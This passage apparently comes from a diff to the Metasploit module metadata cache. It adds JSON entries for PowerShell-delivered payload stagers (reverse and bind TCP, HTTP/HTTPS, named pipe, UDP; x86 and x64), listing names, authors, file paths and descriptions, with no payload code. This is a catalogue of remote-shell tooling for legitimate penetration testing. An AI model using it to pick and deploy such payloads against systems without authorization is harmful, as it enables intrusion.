+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_named_pipe": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_nonx_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (No NX or Win7)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_nonx_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "vlad902 <vlad902@gmail.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker (No NX)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_nonx_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_ord_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_ord_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "spoonm <spoonm@no$email.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_ord_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_tcp_allports": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse All-Port TCP Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_allports",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_tcp_allports",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_tcp_dns": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (DNS)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_dns",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "RageLtMan"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_tcp_dns",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_tcp_rc4": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_tcp_rc4_dns": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_rc4_dns",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_tcp_rc4_dns",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_tcp_uuid": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_udp": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse UDP Stager with UUID Support",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_udp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_udp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_winhttp": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_winhttp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_winhttp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_winhttps": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_winhttps",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTPS (Windows winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_winhttps",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "payload_cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp": {
    "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager",
    "fullname": "payload/cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp",
@@ -179771,6 +181774,525 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "payload_cmd/windows/powershell/x64/custom/bind_ipv6_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/bind_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/bind_named_pipe": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Bind Named Pipe Stager",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/bind_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "UserExistsError"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for a pipe connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/bind_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/bind_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Bind TCP Stager",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/bind_tcp_rc4": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "max3raza",
+      "RageLtMan"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/bind_tcp_uuid": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_http": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_https": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "agix",
+      "rwincey"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_named_pipe": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse TCP Stager",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_tcp_rc4": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "max3raza",
+      "RageLtMan"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_tcp_uuid": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_winhttp": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_winhttp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_winhttp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_winhttps": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_winhttps",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_winhttps",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "payload_cmd/windows/powershell/x64/encrypted_shell/reverse_tcp": {
    "name": "Powershell Exec, Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/cmd/windows/powershell/x64/encrypted_shell/reverse_tcp",
@@ -182789,7 +185311,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
